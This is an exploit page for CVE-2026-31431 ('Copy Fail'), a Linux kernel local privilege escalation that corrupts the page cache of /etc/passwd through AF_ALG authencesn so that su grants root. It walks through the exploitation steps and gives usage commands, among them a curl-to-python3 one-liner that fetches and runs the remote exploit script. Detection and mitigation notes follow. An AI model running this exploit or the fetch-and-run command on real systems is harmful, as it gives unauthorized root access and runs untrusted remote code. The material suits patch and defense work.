## https://sploitus.com/exploit?id=6FD80207-65F0-57F0-B060-428FD326BBED
# CVE-2026-31431 โ "Copy Fail" Local Privilege Escalation
## Overview
CVE-2026-31431 is a local privilege escalation vulnerability in the Linux kernel's `algif_aead` subsystem. The `authencesn` AEAD implementation performs an in-place decrypt via `splice(2)`, placing a page-cache page into the destination scatterlist. A 4-byte value from the AAD (`seqno_lo`) is written back into that page-cache page before the authentication tag is verified โ allowing an unprivileged user to overwrite arbitrary bytes of any world-readable file's kernel page cache.
**Affected kernels:** 6.12, 6.17, 6.18 stable lines (prior to the upstream fix)
**Primitives required:** `AF_ALG` socket, `authencesn(hmac(sha256),cbc(aes))` cipher, `splice(2)` into an `AF_ALG` socket fd
**Impact:** Local privilege escalation to root without any existing elevated access
## How It Works
1. The exploit opens `/etc/passwd` (world-readable) and populates its kernel page cache.
2. It creates an `AF_ALG` socket with the `authencesn` AEAD cipher and splices the target page-cache page into the AEAD operation's destination scatterlist.
3. By placing the desired 4 bytes in the AAD `seqno_lo` field, the kernel's scratch-write lands those bytes at the target offset inside the page-cache page.
4. The exploit repeats this to flip the running user's UID field in `/etc/passwd` from its real value (e.g. `1001`) to `0000`.
5. Once the page cache is corrupted, `su ` validates the user's real password against the untouched `/etc/shadow`, but `setuid(0)` succeeds because `getpwnam()` now reports UID 0.
No disk writes occur at any point. Dropping the page cache (`echo 3 > /proc/sys/vm/drop_caches`) or rebooting fully reverts the effect.
## Usage
> **For authorized testing only. Only run on hosts you own or are explicitly engaged to assess.**
### One-liner
```bash
curl -sL https://raw.githubusercontent.com/mfloresdacunha/CVE-2026-31431/main/exploit.py | TARGET_USER=$(whoami) python3
```
Then, once the script confirms the patch landed:
```bash
su $(whoami)
# enter your own password โ you will get a root shell
```
### Manual
```bash
git clone https://github.com/mfloresdacunha/CVE-2026-31431.git
cd CVE-2026-31431
TARGET_USER=$(whoami) python3 exploit.py
su $(whoami)
```
### Cleanup (from the root shell)
```bash
echo 3 | tee /proc/sys/vm/drop_caches
```
## Requirements
- Linux kernel 6.12โ6.18 (unpatched)
- `AF_ALG` socket support enabled (standard on most distros)
- `authencesn(hmac(sha256),cbc(aes))` loadable (standard on most distros)
- Python 3.6+
- A 4-digit UID (1000โ9999)
- A password set on your own account (for `su` to validate)
## Detection
Use the safe detector from the companion repo [`cve_2026_31431`](https://github.com/mfloresdacunha/CVE-2026-31431) โ it tests the primitive against a throwaway sentinel file and exits `2` if vulnerable, `0` if not, without touching any system file.
## Mitigation
- Apply the upstream kernel patch.
- Block `algif_aead` via `/etc/modprobe.d`: `install algif_aead /bin/false`
- Restrict `AF_ALG` sockets with seccomp or LSM policy.
## References
- [Copy Fail disclosure](https://copy.fail)
- Upstream fix: `net/tls` + `crypto/algif_aead` โ authencesn in-place dst scatterlist isolation